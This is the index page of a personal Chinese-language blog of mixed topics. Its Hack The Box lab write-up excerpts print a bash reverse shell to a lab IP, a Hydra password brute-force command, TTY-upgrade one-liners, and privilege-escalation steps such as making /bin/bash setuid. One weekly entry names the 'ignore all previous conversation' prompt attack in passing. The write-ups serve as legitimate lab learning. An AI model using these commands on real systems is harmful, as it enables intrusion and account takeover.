簡單整理一下 SecList 的辭典。
阅读全文網路版本的芝麻開門?
阅读全文SSH tunneling over SOCKS proxy $ nmap -sT -p22,3306 10.129.202.64 PORT STATE SERVICE 22/tcp open ssh 3306/tcp closed mysql MySQL 並沒有對外開放,若要使用必須透過 port forwarding,可以透過 SSH 將 MySQL 轉到 port 1234 上: abb00717@ABB00717:~ $ ssh -L 1234:localhost:3306 ubuntu@10.129.202.64 $ netstat -antp | grep 1234 tcp 0 0...
阅读全文Nineveh 在 Nineveh 靶機中的 nineveh.htb/department 登入是這麼寫的: session_start(); if (isset($_SESSION['username'])) { header('Location: manage.php'); die(); } $USER = 'admin'; $PASS = '1q2w3e4r5t'; if (isset($_POST['username']) && isset($_POST['pa...
阅读全文通常我都會配合 ffuf 和指定辭典使用: SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:我會最優先使用的 PayloadsAllTheThings/Directory\ Traversal/Intruder/dotdotpwn.txt:測的東西比 Jhaddix 多很多,但很容易誤報。 Nineveh 在 Nineveh 靶機中,我們發現 nineveh.htb/department/manage.php 存在 File Inclusion 漏洞,只要以 nineveh.htb/department/manage.php 為底即可存取本機上 www-data 有權...
阅读全文Nineveh 在 Nineveh 靶機中,我使用 Hydra 配合 xato-net-10-million-passwords-10000.txt 辭典成功爆破出 nineveh.htb/db 的 password123: $ hydra -l admin -P /usr/share/SecLists/Passwords/Common-Credentials/xato-net-10-million-passwords-10000.txt -s 443 -S nineveh.htb https-post-form "/db/index.php:password=^PASS^&...
阅读全文Nineveh 在 Nineveh 這台靶機中,我們利用 Hydra 爆破了 nineveh.htb/db 的登入頁面,在裡面我們可以任意修改資料庫: 資料庫被存在 /var/tmp/,恰好在另外一個網頁 nineveh.htb/department/ 找到了 File Inclusion, 通常會直接用簡單的 配合簡單的 Reverse Shell: bash -c 'sh -i >& /dev/tcp/10.10.17.56/6061 0>&1' 要...
阅读全文Fuzzer 我最常用的就是 ffuf 了,不過還有很多選擇。 MaccGenics Notes - Fuzzing tools (tooling): wenum gobuster feroxbuster … 心得 記得加上 Cookie! 不要懷疑,真的會忘記,如果沒有掃到東西,或是掃到一堆 302,務必務必務必先檢查有沒有加上 Cookie … 副檔名 PHP: -e .php,.txt,.bak,.old,.zip IIS: -e .aspx,.asp,.config Java: -e .jsp,.do,.action 辭典 原本我掃目錄都是用 raft-medium-words-low...
阅读全文主要紀錄一些命令列工具的用法和參數。.
阅读全文看到很酷的服務就會放上來。.
阅读全文打滲透必學的技能之一。你有幾個方法可以叫出 bash: python3 -c 'import pty; pty.spawn("/bin/bash")' /bin/bash -i vim -c ':!/bin/bash' /usr/bin/script -qc /bin/bash /dev/null 接著: svc@busqueda:/var/www/app$ python3 -c 'import pty; pty.spawn("/bin/bash")' svc@busqueda:/var/www...
阅读全文能夠在檔案裡面藏東西的酷技術。
阅读全文基礎的 GraphQL challenge.
阅读全文LFI2RCE via PHP Filters 的小故事以及攻擊講解。
阅读全文非常不負責任的 Redis 教學。
阅读全文在 forum.collect.htb 的論壇中我們找到一段代理紀錄,重放 token 就能把自己的 session 提權成 admin。進到 /admin 後發現註冊請求是用 XML 傳送的,發現並利用 OOB XXE 讀取檔案,獲得 developers.collect.htb 的 Basic Auth 密碼與 Redis 密碼,再直接改寫 Redis 上的 PHP session 繞過登入表單。登入後利用 LFI2RCE 取得 www-data 的 shell,透過 victor 名下的 php-fpm 執行命令並寫入 SSH 公鑰登入 victor,最後在 root 身分執行的 pollution_api 中利用 lodas…
阅读全文在 BroScience 網站中我們發現 img.php 存在路徑穿越,透過原始碼發現啟用碼可以暴力破解,啟用帳號後再利用反序列化漏洞取得 www-data 的 shell。接著從資料庫撈出密碼雜湊,破解 bill 的密碼並 SSH 登入。至於 root, 我們發現某個 root cron 執行腳本存在 Command Injection,生成惡意憑證以後即可取得 root shell。
阅读全文說筆記有點不精確,但實在想不到更好的詞。我會在這裡分類打過的靶機,並附帶整理用過的技巧。或許等有空才會加上講解吧? 如果你是想學滲透,很抱歉我無法幫你。這裡是推薦的學習資源: HackTricks Hack the Box Academy 實作資源: Hack the Box .
阅读全文現在改到 自架的 Mastodon 上面了,有興趣的可以上去看看。 2026-04-01 應該把這個部落格當成別人的部落格,每當「啊,真希望這個議題有人講」、「希望台灣也有人在聽這種音樂」之時,就是這裡多一篇筆記的時候了。 2026-03-31 sudo 編輯不要用 sudo vim。先在 .bashrc 裡設定預設的編輯器,之後都請用 sudoedit 代替。 2026-03-29 看完了馬世芳的《地下鄉愁藍調》,看完了〈擁舞的詩神與厲鬼〉馬上找了 Bob Dylan 《亞伯廳一九六六》來聽,迅速點開最後一首 “Like a Rolling Stone” … 猶大、背叛民謠、長期摧殘 … ...
阅读全文在 Imagery 圖片上傳管理網站中,我們利用 Bug Reports 的 XSS 漏洞取得 admin 的 session。緊接著利用 Admin Panel 中 Download Log 的 LFI 漏洞取得 testuser 的帳密。最後利用 Crop Image 功能的 OS Command Injection 取得 web 的 shell。接著我們在系統中發現加密的備份檔案,暴力破解後取得 mark 帳號的密碼,登入後透過濫用自製備份工具的權限取得 root shell。
阅读全文在 Reset 網站中我們發現重設密碼的 API 會直接回傳新密碼,登入後利用 Log Poisoning 取得 RCE。接著利用組態錯誤,在攻擊機上建立同名的 sadm 帳號,就能免密碼 rlogin 登入靶機的 sadm 帳號。最後我們在執行中的 tmux session 找到密碼,利用 sudo nano 取得 root shell。
阅读全文透過 dig 我們取得靶機的第一個 vHost ,並在該 vHost 上的 Payroll Management System 發現 SQL Injection,藉由資料庫使用者的 FILE 權限以 load_file() 讀取 Nginx 設定檔,找出第二個 vHost。而該網站存在 LFI,讀出使用者 michael 的 id_rsa 後以 SSH 取得初始立足點。最後利用 michael 可免密碼 sudo 重啟 fail2ban、又能寫入其設定目錄的組合,將封鎖動作改為 chmod 4777 /bin/bash,觸發後以 bash -p 提權至 root。
阅读全文在 Editorial 網站中發現了 SSRF 漏洞,用其掃描內網以後從內部的 API 取得一組憑證,並以 SSH 登入取得初始立足點。枚舉時發現一個 Git repo,從 commit history 中發現了另一組憑證。橫向移動後進一步枚舉,發現一支以 root 執行的 clone 腳本,把未經驗證的參數交給有 CVE-2022-24439 的 GitPython,且主動啟用了 git 的 ext transport,藉此以 root 身分執行任意指令完成提權。
阅读全文正在挑戰的項目 在畢業以前拿到 HTB CWES & CPTS 已完成的挑戰 在大四以前把 HTB CWES 的 RELATED JOB-ROLE PATH 走完 每週持續寫週記總計持續 18 週 已於 2025/12 在 Advent of Code 挑戰中拿到 18 顆星星 已於 2025/11 達成 Leetcode 500 題 已於 2023/06 畢業於建功高中 已於 2023/06 剪輯完超級牛逼的畢業影片 已於 2021/08 爬進 osu! 全球前五萬 大佬 somehow 看到我的 YT 影片,somehow 找到我 osu! 的帳號並且追蹤我了,yay 暫時停止的挑...
阅读全文顧名思義,儲存 Linux 相關的筆記。大部分都是紀錄遇到的奇怪問題,主要是覺得記錄下來,或許以後遇到類似的問題也可以照著解決。.
阅读全文leetcode.com/problems/evaluate-reverse-polish-notation/description/ 其實題目蠻簡單的,大家應該都能寫出類似的邏輯: class Solution: def evalRPN(self, tokens: List[str]) -> int: operators = ['+', '-', '*', '/'] stack = [] for token in tokens: if token not in operators: stack.append...
阅读全文解決 pipx 安裝 droopescan 時 No module named 'imp' 的問題。
阅读全文解決桌面一直彈出來的問題,去你媽的 Wayland。
阅读全文解決 medusa "Couldn't load ssh" 的問題。
阅读全文所有人都該看過的中文寫作指北。
阅读全文跟我用同樣模板的超讚資安部落格。
阅读全文隨機分享小知識。
阅读全文紀錄我從 Ubuntu 26 在另一顆獨立硬碟上安裝 Windows 11,並透過 Image Recovery 恢復去年的 Windows 映像備份的全過程。
阅读全文教你把不小心 commit 出去的密碼改掉。
阅读全文為了過期末考試而準備編譯器筆記。
阅读全文結果最近都沒在刷 Leetcode,都在玩 Hack The Box xD,覺得 Hack The Box 的題目真的比 Leetcode 的還要實際多了。而且現在 CWES Path 也已經走完了,要開始狂刷猛刷 HTB 了!.
阅读全文小提示,展開和收起資料夾請按最左邊的箭頭,點字會直接進入 Index Page。 嗨!這裡是 ABB00717。 我這個人各方面來說都很宅,且很喜歡和電腦打交道。在這裡我會紀錄所見所聞,你看到任何東西都不要意外。不過主題大致上會是: 程式設計(競賽程式、資訊安全、後端等等) 作品(專輯、動漫、漫畫、遊戲等等)評論 閱讀(書籍、文章、貼文等等)筆記 生活感想 你可以去部落格聚集地裡頭看看我覺得很有趣的部落格。我也很愛聽音樂,你可以在音樂那裡偷窺我的品味。我之前每個禮拜都會寫週記,但現在休刊了。之前也會記錄做過的夢,朋友都誇我是下一個藤本樹 x),但最近醒來都忘了,真不曉得之前怎麼都記得。 我如...
阅读全文這裡紀錄很多我覺得很酷的部落格,也會摘錄一些能反應部落格性質的文章。分類不一定準確,但我盡力。 思考 極客死亡計畫 讓我開始想寫部落格的主要推手 震撼即真理 稻草人週刊 Vol.58 異鄉人 - 卡謬 Paul Graham WRITE AND WRITE-NOTS flow2 The Myth of Sisyphus On 10 Years of Writing a Blog Nobody Reads Wiwi Blog 讓廢文現形 澳洲好好吃 3.64 億個網站,你去過幾個? Lelouch You Are NOT Dumb, You Just Lack the Prerequisites...
阅读全文利用 Python 模組 Searchor 的指令注入漏洞獲得使用者存取權限以後,在 Git 設定檔發現憑證並登入 Gitea 服務。接著枚舉 Docker 容器,發現管理員的 Gitea 憑證。最後在系統檢查腳本中發現相對路徑漏洞並最終獲得 RCE。
阅读全文原本想算數學,後來發現 n <= 10^4,就直接照著直覺硬幹了。 from math import floor class Solution: def rotatedDigits(self, n: int) -> int: result = 0 for num in range(1, n + 1): # 'e' represent end of string s = str(num) + "\0" # If the number remain unchanged after switching diff = False for c in s...
阅读全文leetcode.com/problems/rotate-function 瞪眼看一下,很快就能發現規律了: F(k) = F(k-1) + \text{sum}(\text{nums}) - n \cdot \text{nums}[n-k] from typing import List class Solution: def maxRotateFunction(self, nums: List[int]) -> int: # Calculate initial F(0) and the total sum of elements.
阅读全文原本我在外都是用 Nothing Ear (a),結果最近電池出問題,操。右耳耗電速度也超快,拿起來永遠最多只有 85%,過了幾分鐘,馬上電量告急。左耳 85% 剩餘,右耳卻只剩 10%。 不只有我的耳機出現問題,非常多人耳機過了一年都有出現同樣的問題。我從沒看過這麼多人一致在六個月後出現相同的狀況,以後再也不買這個品牌的耳機了。 於是我又把我的耳罩式耳機換回來了,這次想順便把該換的配件都換一換。 耳罩用了一年,已經破的要死。耳機磁吸側蓋也不見了一個,就把這些都順便買買吧! 換完以後看起來真的跟全新的沒什麼區別。不只外觀,換了耳罩以後,感覺音質都提昇了不少。真的,感覺就像換了全新的耳機。 超爽...
阅读全文2026-04-30 休刊。 這次沒有高大上的理由,就只是我累了,覺得它實在太花時間了。自己總結其實很快就結束了,最累人的其實是把它「寫成給別人看的樣子」,就你畢竟是發成部落格嘛,你一定不可能只總結個幾句話就含糊過去了,就會對質量有一定的要求。 但既然週刊只是寫個自己看的,那就沒必要再花這個額外的成本,而且過了這麼久,也早就養成了「不寫週刊很奇怪」的習慣了。 所以休刊。只是暫時休刊嘛?還是以後都不會再發了?也不確定,總之這十八周的週刊我還是寫得很開心,體驗非常好,「不只當消費者」的目的也有達到。 我記得原本有蠻多人受它的文章影響開始寫的,但我知道的也都默默停更了,原因不外乎就是太花時間。不禁...
阅读全文覺得有時候做的很奇妙的夢,可以來紀錄一下。是說能讓我記住的夢,通常都很 … 不堪入目?一定都和血腥暴力色情有關。什麼殺人遊樂園,每個人都很開心的坐上各種自殺遊樂器材。砍頭生存戰,用各種武器把對手頭砍掉,我還記得被金劍砍是最沒感覺的。或是,就很單純無聊的春夢。 我相信我的夢裡應該不會有個資吧? 發現睡覺的夢都是一段一段的,和《絕佳時間》說的一樣。哪天從這裡挑幾篇畫成短篇漫畫,看可不可以擊敗藤本樹 x)。 旅行 2026-04-15 某天午覺夢到的,原本以為這場夢做了超久,沒想到只做了差不多兩到三小時。 夢見了某個 Better Call Saul 小劇場:同樣的事情,但換到不同情境,做的成本會不...
阅读全文David Bowie - Low、Múm - Finally We are No One、打字機和專注、Angine de Poitrine 的「中之人」、《惡之華》(押見修造的漫畫)、《Binary Hacks Rebooted》
阅读全文這禮拜期中考周所以沒有週刊。.
阅读全文Bob Dylan - Bootleg Vol.4、Silver Mt. Zion - Born Into Trouble As The Sparks、Linux in the House、搜尋引擎問題、Copilot 僅供娛樂用途、Memos、Channel Suffer
阅读全文直接照著這篇文章做就可以了,因為我就是照著它做的 xD python2 和 pip2 都可以正常使用。若原網址失效請點這裡去 Archived Version。 好吧,這樣有點不負責任,稍微講點東西好了,我是選擇從原始碼編譯的。過程中確實遇到一些警告,還有在 make 階段遇到 OpenSSL 測試不通過的問題。不過我都直接忽略,最後還是可以正常使用。 恩 … 對就這樣。.
阅读全文這裡紀錄一些我聽過、愛聽的音樂。筆記條目主要寫專輯的聽後感,有故事就會寫故事。
阅读全文蛋堡的《你所不知道的杜振熙之內部整修》和《月光》。破除「資訊天生就該免費/自由」的神話。《身為駭客的良知》。簡單判斷自己是否正用 AI 自廢武功。Donald Knuth 也用 Claude 研究。「忽略前面所有對話」之攻擊
阅读全文